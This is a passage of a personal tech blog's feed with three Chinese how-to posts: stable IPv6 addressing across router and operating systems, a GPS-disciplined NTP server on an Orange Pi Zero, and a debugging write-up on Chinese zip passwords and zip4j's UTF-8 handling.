<h3 id="配置目标"><a href="#配置目标" class="headerlink" title="配置目标"></a>Configuration goals</h3><p>Give the devices that need to offer services a stable privacy address, that is:<br>1. Do not use EUI-64 (so the client MAC cannot be derived from the IPv6 SLAAC address).<br>2. Keep the address as fixed as possible, so firewall rules are easy to write. </p>
<h3 id="路由配置"><a href="#路由配置" class="headerlink" title="路由配置"></a>Router configuration</h3><p>By default ImmortalWrt automatically creates a WAN6 virtual interface as soon as you dial up, which saves a lot of trouble.<br>Change the configuration as shown in the screenshots:<br>Set the lease time to 12 hours<br><img src="/pictures/ipv6-in-2024/1.png"><br>Assignment length /64, with the router's own address generated via EUI-64<br><img src="/pictures/ipv6-in-2024/2.png"><br>Set the announced DNS servers manually instead of using the ISP's<br><img src="/pictures/ipv6-in-2024/3.png"><br>Enable SLAAC and configure the M and O flags<br><img src="/pictures/ipv6-in-2024/4.png"> </p>
<p>This configuration enables both Stateless (SLAAC) and Stateful (DHCPv6) </p>
<p>Currently:<br>  Android devices only support obtaining IPv6 addresses via Stateless<br>  Debian-like systems have fairly complete support for both Stateless and Stateful<br>  Windows (Windows 10 21H2) has fairly complete support for Stateless, but its Stateful support has problems </p>
<p>So you can perfectly well <a href="https://github.com/immortalwrt/user-FAQ/blob/main/immortalwrt%20%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98%E6%8C%87%E5%8C%97.md">follow the guide and use Stateless only</a>; my enabling both is purely asking for trouble. </p>
<h3 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h3><p>Ubuntu 20+ uses Netplan to manage networking by default </p>
<figure class="highlight yaml"><figcaption><span>/etc/netplan/00-default-config.yaml</span></figcaption><table><tr><td class="code"><pre><span class="line"><span class="attr">network:</span></span><br><span class="line">  <span class="attr">version:</span> <span class="number">2</span></span><br><span class="line">  <span class="attr">renderer:</span> <span class="string">networkd</span></span><br><span class="line">  <span class="attr">ethernets:</span></span><br><span class="line">    <span class="attr">enp2s0:</span></span><br><span class="line">      <span class="attr">dhcp4:</span> <span class="literal">true</span></span><br><span class="line">      <span class="attr">dhcp6:</span> <span class="literal">true</span></span><br><span class="line">      <span class="attr">ipv6-privacy:</span> <span class="literal">false</span></span><br><span class="line">      <span class="attr">ipv6-address-token:</span> <span class="string">::dead:beef:114:514</span></span><br><span class="line">      <span class="comment"># The token here can be changed to anything you like, as long as it is a valid token</span></span><br><span class="line">      <span class="comment"># Taking this token as an example, suppose the PD prefix from the ISP is 240e:1234:4567:9100::/64 </span></span><br><span class="line">      <span class="comment"># China Telecom normally hands out a /56, but the router setting above was changed to /64; the two zeros in between make the address look nicer </span></span><br><span class="line">      <span class="comment"># The final address is then 240e:1234:4567:9100:dead:beef:114:514</span></span><br><span class="line"> </span><br></pre></td></tr></table></figure>
<h3 id="Debian"><a href="#Debian" class="headerlink" title="Debian"></a>Debian</h3><p>First, configure networkd to manage the network </p>
<figure class="highlight bash"><figcaption><span>Bash</span></figcaption><table><tr><td class="code"><pre><span class="line"><span class="built_in">mv</span> /etc/network/interfaces /etc/network/interfaces.save </span><br><span class="line"><span class="built_in">mv</span> /etc/network/interfaces.d /etc/network/interfaces.d.save </span><br><span class="line"></span><br><span class="line">systemctl <span class="built_in">enable</span> systemd-networkd.service </span><br><span class="line">systemctl start systemd-networkd.service </span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><figcaption><span>/etc/systemd/network/default.network</span></figcaption><table><tr><td class="code"><pre><span class="line">[Match]</span><br><span class="line">Name=eth0</span><br><span class="line"></span><br><span class="line">[Network]</span><br><span class="line">DHCP=yes</span><br><span class="line">IPv6AcceptRA=yes</span><br><span class="line">IPv6PrivacyExtensions=no</span><br><span class="line"></span><br><span class="line">[IPv6AcceptRA]</span><br><span class="line">Token=::dead:beef:114:514</span><br><span class="line"># The token is explained above</span><br></pre></td></tr></table></figure>
<h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><p>Update: Windows is a pure special case here. It has neither RFC 7217 support nor token support (at least Windows 10 21H2 has none at all)<br>So here we are forced to use EUI-64, and change the original MAC address to protect privacy </p>
<p>Start PowerShell as administrator: </p>
<figure class="highlight powershell"><figcaption><span>Powershell</span></figcaption><table><tr><td class="code"><pre><span class="line"><span class="built_in">Set-NetIPv6Protocol</span> <span class="literal">-RandomizeIdentifiers</span> Disabled</span><br><span class="line"><span class="comment"># Turn off random address generation</span></span><br><span class="line"><span class="comment"># With this set to Disabled, Windows uses EUI-64</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">Set-NetIPv6Protocol</span> <span class="literal">-UseTemporaryAddresses</span> Disabled</span><br><span class="line"><span class="comment"># Stop Windows from using privacy addresses (RFC 4941)</span></span><br></pre></td></tr></table></figure>
<h3 id="解释部分"><a href="#解释部分" class="headerlink" title="解释部分"></a>Explanation</h3><p>With this configuration, each device can in theory obtain two sets of IPv6 addresses, one from SLAAC and one assigned by DHCPv6.<br>China Telecom drops and re-establishes the dial-up session every few days, which changes the PD prefix. Because addresses obtained through SLAAC are updated quickly, connectivity is restored quickly on every system.<br>DHCPv6 is less predictable. I set the lease time to 12 hours, and Debian-like systems ask the DHCP server for an address again every 12 hours, which is good.<br>Windows does not. However I change the settings, Windows always manages to come up with a three-day lease,<br>and then, once the prefix changes and the old address stops working, Windows generates a new privacy address for itself, which in turn breaks the firewall rules.<br>Of course, the method described in this post is not RFC 7217. If you need RFC 7217, see the references; personally I find the addresses 7217 produces too long and ugly. </p>
<h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>References</h3><p><a href="https://wiki.archlinuxcn.org/wiki/Systemd-networkd">https://wiki.archlinuxcn.org/wiki/Systemd-networkd</a></p><p><a href="https://wiki.archlinuxcn.org/wiki/IPv6#%E7%A8%B3%E5%AE%9A%E7%9A%84%E9%9A%90%E7%A7%81%E5%9C%B0%E5%9D%80">https://wiki.archlinuxcn.org/wiki/IPv6#%E7%A8%B3%E5%AE%9A%E7%9A%84%E9%9A%90%E7%A7%81%E5%9C%B0%E5%9D%80</a></p><p><a href="https://wiki.debian.org/SystemdNetworkd">https://wiki.debian.org/SystemdNetworkd</a></p>]]></content>
<summary type="html"><h3 id="Do-not-手欠"><a href="#Do-not-手欠" class="headerlink" title="Do not 手欠"></a>Do not fiddle</h3><p>A while ago I changed my broadband plan and lost my public IPv4 address; the ISP will not give one back even on request, so I was forced to start moving to IPv6.</p>
<hr>
<h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a>Environment</h3><p>Main router:<br>&emsp;&emsp;ImmortalWrt 21.02<br>Systems:<br>&emsp;&emsp;Windows 10 LTSB 21H2<br>&emsp;&emsp;Debian 12 (bookworm)<br>&emsp;&emsp;Ubuntu 22.04 LTS (jammy)<br>ISP:<br>&emsp;&emsp;China Telecom (DHCPv6-PD) </p></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>Building a Stratum 1 NTP server with an Orange Pi Zero</title>
<link href="https://thinkalone.win/orangepi-zero-ntp.html"/>
<id>https://thinkalone.win/orangepi-zero-ntp.html</id>
<published>2024-07-11T04:00:00.000Z</published>
<updated>2025-09-10T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>首先:这个东西有什么用?<br>答:<strong>没有任何用处,但是能让你内网的设备时间精度达到亚毫秒级</strong> </p><p><img src="/pictures/orangepi-zero-ntp/1.png" alt="time.is"> </p><p>当然,不要以这个网页为参考,实际误差要远远低于显示: </p><p><img src="/pictures/orangepi-zero-ntp/2.png" alt="chronyc sources"> </p><p>实际应该是几个微秒的误差。 </p><hr><span id="more"></span> <h3 id="材料准备"><a href="#材料准备" class="headerlink" title="材料准备"></a>材料准备</h3><blockquote><ol><li>Orange Pi Zero LTS 一个<br> 也就是初代的Orange Pi Zero,理论上Zero2、3也可以,但是需要根据实际接线情况修改配置</li><li>ATGM336H GPS模块 一个<br> 可替换,只要带PPS输出的就行,我选这个型号是因为他是ipex接口可以外接天线<br> 2.1 GPS天线(3.3v供电) 一个<br> 2.2 SMA转IPEX射频转接线 一条</li><li>DS3231 实时时钟模块 一个<br> DS3231M也可以,这里只是用作掉电后的时间备份,精度不太重要</li><li>2*13双排26P 2.54杜邦插头双排端子线 一个<br> 用于优雅的连接到Orange Pi的26P GPIO接口</li></ol></blockquote><p>其他电子配件不再赘述 </p><h3 id="硬件配置"><a href="#硬件配置" class="headerlink" title="硬件配置"></a>硬件配置</h3><h4 id="GPS模块"><a href="#GPS模块" class="headerlink" title="GPS模块"></a>GPS模块</h4><p>使用USB-TTL板将模块连接到电脑,使用对应的工具将GPS模块的串口波特率调整到115200(模块一般默认为9600,过低,时间报文传输时间太长,会导致延迟过高)<br>我使用的ATGM336H模块可以用<a href="https://github.com/zxcwhale/GnssToolKit3-binaries/releases">GnssToolKit3</a>进行配置<br>其他模块可以参考手册进行配置 </p><h4 id="DS3231模块"><a href="#DS3231模块" class="headerlink" title="DS3231模块"></a>DS3231模块</h4><p>如果你使用的是同款模块(大概率),使用烙铁拆焊掉这里的电阻以防止VCC倒灌进入电池<br><img src="/pictures/orangepi-zero-ntp/3.png" alt="DS3231"> </p><h4 id="接线图"><a href="#接线图" class="headerlink" title="接线图"></a>接线图</h4><p><img src="/pictures/orangepi-zero-ntp/4.png" alt="接线图"> </p><h3 id="系统配置"><a href="#系统配置" class="headerlink" title="系统配置"></a>系统配置</h3><p>参考:<a href="https://github.com/moonbuggy/Orange-Pi-Zero-GPS-NTP">https://github.com/moonbuggy/Orange-Pi-Zero-GPS-NTP</a><br>下载对应的<a href="https://www.armbian.com/orange-pi-zero/">armbian</a>系统并将系统安装到TF卡<br>系统初始化完成后,使用<code>armbian-config</code>工具,进入<code>System => Hardware</code>启用<code>i2c0, pps-gpio, uart2</code><br>运行命令</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo sh -c "echo 'param_pps_pin=PA3' >> /boot/armbianEnv.txt"</span><br></pre></td></tr></table></figure><p>指定PA3为PPS输入 </p><p>更新:使用Orange Pi Zero3时,armbian可能没有带pps的dts,可以手动创建一个,和ds3231的dts一样安装: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">/dts-v1/;</span><br><span class="line">/plugin/;</span><br><span class="line"></span><br><span class="line">/ {</span><br><span class="line"> compatible = "allwinner,sun50i-h616";</span><br><span class="line"></span><br><span class="line"> fragment@0 {</span><br><span class="line"> target = <&pio>;</span><br><span class="line"> __overlay__ {</span><br><span class="line"> pps_pins: pps_pins {</span><br><span class="line"> pins = "PC11";</span><br><span class="line"> function = "pps";</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"> 
};</span><br><span class="line"></span><br><span class="line"> fragment@1 {</span><br><span class="line"> target-path = "/";</span><br><span class="line"> __overlay__ {</span><br><span class="line"> pps@0 {</span><br><span class="line"> compatible = "pps-gpio";</span><br><span class="line"> pinctrl-names = "default";</span><br><span class="line"> pinctrl-0 = <&pps_pins>;</span><br><span class="line"> gpios = <&pio 2 11 0>; /* PC11 */</span><br><span class="line"> status = "okay";</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line">};</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>新建文件<code>ds3231.dts</code>: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">/dts-v1/;</span><br><span class="line">/plugin/;</span><br><span class="line"></span><br><span class="line">/ {</span><br><span class="line"> compatible = "xunlong,orangepi-zero", "allwinner,sun8i-h2-plus";</span><br><span class="line"></span><br><span class="line"> fragment@0 {</span><br><span 
class="line"> target-path = "/aliases";</span><br><span class="line"></span><br><span class="line"> __overlay__ {</span><br><span class="line"> rtc0 = "/soc/i2c@1c2b400/ds3231";</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> fragment@1 {</span><br><span class="line"> target-path = "/soc/i2c@1c2b400";</span><br><span class="line"></span><br><span class="line"> __overlay__ {</span><br><span class="line"> ds3231: rtc@68 {</span><br><span class="line"> compatible = "maxim,ds3231";</span><br><span class="line"> reg = <0x68>;</span><br><span class="line"> #clock-cells = <1>;</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>运行命令 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo armbian-add-overlay ds3231.dts</span><br></pre></td></tr></table></figure><p>启用DS3231的DTS</p><h3 id="软件配置"><a href="#软件配置" class="headerlink" title="软件配置"></a>软件配置</h3><h4 id="配置gpsd"><a href="#配置gpsd" class="headerlink" title="配置gpsd"></a>配置<code>gpsd</code></h4><p>安装 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install gpsd gpsd-tools pps-tools i2c-tools</span><br></pre></td></tr></table></figure><p>修改配置文件<code>/etc/default/gpsd</code>: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># Devices gpsd should connect to at boot time.</span><br><span class="line"># They need to be read/writeable, either by user gpsd or the group dialout.</span><br><span class="line">DEVICES="/dev/ttyS2 /dev/pps0"</span><br><span class="line"></span><br><span class="line"># Other options you want to pass to gpsd</span><br><span class="line">GPSD_OPTIONS="-n -s 115200"</span><br><span class="line"></span><br><span class="line"># Automatically hot add/remove USB GPS devices via gpsdctl</span><br><span class="line">USBAUTO="true"</span><br><span class="line"></span><br><span class="line">/bin/stty -F /dev/ttyS2 115200</span><br><span class="line">/bin/setserial /dev/ttyS2 low_latency</span><br></pre></td></tr></table></figure><p>运行命令启动<code>gpsd</code>服务: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl daemon-reload</span><br><span class="line">sudo systemctl enable gpsd</span><br><span class="line">sudo systemctl start gpsd</span><br></pre></td></tr></table></figure><p>运行<code>gpsmon</code>查看是否有输出,如配置正确应该可以看到NMEA报文,位置,卫星数等信息<br>手动调整天线的位置、角度,尽量靠窗,让可见卫星数尽可能的多,使定位误差尽可能的小<br><img src="/pictures/orangepi-zero-ntp/5.png" alt="gpsmon"> </p><h4 id="配置chrony"><a href="#配置chrony" class="headerlink" title="配置chrony"></a>配置<code>chrony</code></h4><p>安装: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install chrony</span><br></pre></td></tr></table></figure><p>创建配置文件<code>/etc/chrony/conf.d/gpsd.conf</code>: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td 
class="code"><pre><span class="line">refclock SHM 0 precision 1e-1 offset 0.0 delay 0.2 refid NMEA noselect</span><br><span class="line">refclock PPS /dev/pps0 lock NMEA refid PPS maxlockage 32 prefer</span><br></pre></td></tr></table></figure><p>修改配置文件<code>/etc/default/chrony</code> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># This is a configuration file for /etc/init.d/chrony and</span><br><span class="line"># /lib/systemd/system/chrony.service; it allows you to pass various options to</span><br><span class="line"># the chrony daemon without editing the init script or service file.</span><br><span class="line"></span><br><span class="line"># Options to pass to chrony.</span><br><span class="line">DAEMON_OPTS="-F 1 -r -m -s"</span><br></pre></td></tr></table></figure><p>配置DS3231: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># E̅O̅S̅C̅</span><br><span class="line">i2cset -y 0 0x68 0x0e 0x1c</span><br><span class="line"></span><br><span class="line"># OSF</span><br><span class="line">i2cset -y 0 0x68 0x0f 0x08</span><br><span class="line"></span><br><span class="line"># 设置时间</span><br><span class="line">sudo hwclock -w -f /dev/rtc</span><br><span class="line"></span><br><span class="line"># 读取时间</span><br><span class="line">sudo hwclock -r -f 
/dev/rtc</span><br></pre></td></tr></table></figure><h3 id="杂项与微调"><a href="#杂项与微调" class="headerlink" title="杂项与微调"></a>杂项与微调</h3><h4 id="配置上游NTP-server"><a href="#配置上游NTP-server" class="headerlink" title="配置上游NTP server"></a>配置上游NTP server</h4><p>使用就近的NTP server<br>将配置文件<code>/etc/chrony/chrony.conf</code>中原来的pool/server部分修改如下: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">server 0.cn.pool.ntp.org iburst</span><br><span class="line">server 1.cn.pool.ntp.org iburst</span><br><span class="line">server 2.cn.pool.ntp.org iburst</span><br><span class="line">server 3.cn.pool.ntp.org iburst</span><br></pre></td></tr></table></figure><h4 id="offset整定"><a href="#offset整定" class="headerlink" title="offset整定"></a>offset整定</h4><p>前文在配置文件<code>/etc/chrony/conf.d/gpsd.conf</code>中,暂时将<code>offset</code>设置为了<code>0.0</code>,在chrony服务正常运行半小时后,运行命令: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chronyc sourcestats</span><br></pre></td></tr></table></figure><p>查看<code>NMEA</code>项的<code>Offset</code>部分: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Name/IP Address NP NR Span Frequency Freq Skew Offset Std Dev</span><br><span class="line">==============================================================================</span><br><span class="line">NMEA 7 3 95 -134.817 741.206 +4490us 9095us</span><br><span class="line">PPS 39 26 608 -0.000 0.008 -1ns 2553ns</span><br><span 
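class="line">......</span><br></pre></td></tr></table></figure><p>Convert the <code>Offset</code> value to seconds, enter it in the configuration file, and restart chrony.<br>My value has already been tuned, so it is only a few milliseconds; untuned, it is typically around ±0.2 seconds.<br>The offset value should not exceed ±0.45 seconds.</p><h4 id="开启chrony的服务器模式"><a href="#开启chrony的服务器模式" class="headerlink" title="开启chrony的服务器模式"></a>Enabling chrony's server mode</h4><p>At the end of the configuration file <code>/etc/chrony/chrony.conf</code>, add one line: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">allow</span><br></pre></td></tr></table></figure><p>chrony can now be reached by devices on the LAN. Set the server address to chrony's IP, sync the time, and then you can take a screenshot and show it off. </p>]]></content>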
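<summary type="html"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h3><p>First: what is this thing good for?<br>Answer: <strong>Nothing at all, but it can give the devices on your internal network sub-millisecond time accuracy</strong> </p>
<p><img src="/pictures/orangepi-zero-ntp/1.png" alt="time.is"> </p>
<p>Of course, don't take this web page as the reference; the actual error is far lower than what it shows: </p>
<p><img src="/pictures/orangepi-zero-ntp/2.png" alt="chronyc sources"> </p>
<p>The actual error should be a few microseconds. </p>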
<hr></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>The Exasperating Zip and Chinese Passwords</title>
<link href="https://thinkalone.win/chinese-zip-password.html"/>
<id>https://thinkalone.win/chinese-zip-password.html</id>
<published>2024-03-01T04:00:00.000Z</published>
<updated>2024-03-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="起因"><a href="#起因" class="headerlink" title="起因"></a>How it started</h3><p><strong>One day, a friend forwarded me a password-protected Zip archive over QQ</strong><br><img src="/pictures/chinese-zip-password/1.png"></p><p>I took a look, double-clicked it so that it opened in WinRAR by default, then copied and pasted the password:<br><img src="/pictures/chinese-zip-password/2.png"></p><p>Huh? Wrong password?</p><hr><span id="more"></span> <p>My first reaction, of course, was to suspect that my friend had gotten careless and let his hand slip, accidentally typing something extra while entering the password. But after 10 minutes of friendly discussion, he was absolutely certain that his hand had not slipped; he even re-downloaded the archive he had sent me and, <strong>on his phone</strong>, pasted the password in and extracted it successfully.</p><p>I frowned, and immediately sensed that I was standing at the edge of a pit.</p><h3 id="试图复现:"><a href="#试图复现:" class="headerlink" title="试图复现:"></a>Trying to reproduce it:</h3><p>Here I use MiXplorer, the file manager I normally use, as the example:<br>Create a new Zip archive. MiXplorer normally only allows letters and digits in the password field, but we can paste a Chinese password straight in:<br><img src="/pictures/chinese-zip-password/3.jpg"></p><p>Then test extraction on the phone:<br><img src="/pictures/chinese-zip-password/4.jpg"><br><img src="/pictures/chinese-zip-password/5.jpg"><br>Clearly, it extracts fine. Next we transfer the archive to the computer (Win10) and try again:<br><img src="/pictures/chinese-zip-password/6.png"><br><img src="/pictures/chinese-zip-password/7.png"> </p><h3 id="原因分析:"><a href="#原因分析:" class="headerlink" title="原因分析:"></a>Root cause analysis:</h3><p>No need to think hard: it must be an encoding problem. But I was curious: why does this happen? And what exactly was the original password encoded into?</p><p>First, we search Google for <code>java zip 中文密码</code> ("java zip Chinese password"), which turns up a package: <a href="https://github.com/srikanth-lingala/zip4j">zip4j</a><br>Then we write a short piece of code to try extracting the archive:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> net.lingala.zip4j.ZipFile;</span><br><span class="line"></span><br><span
class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnZip</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable {</span><br><span class="line">        <span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">"测试"</span>;</span><br><span class="line">        <span class="type">ZipFile</span> <span class="variable">zipFile</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ZipFile</span>(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\27.zip"</span>);</span><br><span class="line">        zipFile.setPassword(password.toCharArray());</span><br><span class="line">        zipFile.extractAll(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\d"</span>);</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Run it, and it fails immediately: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Exception in thread "main" net.lingala.zip4j.exception.ZipException: Wrong password!</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>A search shows that Android's default encoding for Chinese is UTF-8, and browsing the zip4j documentation turns up this method: <a href="https://javadoc.io/static/net.lingala.zip4j/zip4j/2.11.5/net/lingala/zip4j/ZipFile.html#setUseUtf8CharsetForPasswords(boolean)">setUseUtf8CharsetForPasswords</a>. We change the code as follows:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> net.lingala.zip4j.ZipFile;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnZip</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable {</span><br><span class="line">        <span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">"测试"</span>;</span><br><span class="line">        <span class="type">ZipFile</span> <span class="variable">zipFile</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ZipFile</span>(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\27.zip"</span>);</span><br><span class="line">        zipFile.setUseUtf8CharsetForPasswords(<span class="literal">false</span>);</span><br><span class="line">        zipFile.setPassword(password.toCharArray());</span><br><span class="line">        zipFile.extractAll(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\d"</span>);</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>This time it runs successfully.<br>It runs, but why? Searching by the method name, we found this issue: <a href="https://github.com/srikanth-lingala/zip4j/issues/328">https://github.com/srikanth-lingala/zip4j/issues/328</a>
</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Using non-ascii characters for passwords is in a grey zone as far as zip specification is concerned. Some tools convert passwords to utf8 and some don't. With the change that you linked, zip4j converts the password to utf8 by default, and I guess Windows doesn't, and that's why it works fine in your case when you revert the utf8 conversion.</span><br><span class="line"></span><br><span class="line">I added an option to ZipFile api to use utf8 or not for password encoding and decoding. If you are sure that your zip file will only be used on windows, you can now generate the zip files by not using utf8. You can set this flag via ZipFile.setUseUtf8CharsetForPasswords(boolean).</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The gist is that when zip4j encounters a Chinese password it first converts the password to UTF-8, but Windows does not. That answers my first question. Now let's look into the second: what exactly was the original password encoded into? </p><h3 id="密码便乘变成什么样了?"><a href="#密码便乘变成什么样了?"
class="headerlink" title="密码便乘变成什么样了?"></a>What did the password <del>beecome</del> become?</h3><p>Let's go straight to the zip4j source code: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/ZipFile.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setUseUtf8CharsetForPasswords</span><span class="params">(<span class="type">boolean</span> useUtf8CharsetForPasswords)</span> {</span><br><span class="line"> <span class="built_in">this</span>.useUtf8CharsetForPasswords = useUtf8CharsetForPasswords;</span><br><span class="line"> }</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Following it further: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/crypto/StandardDecrypter.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">init</span><span class="params">(<span class="type">byte</span>[] headerBytes, <span class="type">char</span>[] password, <span 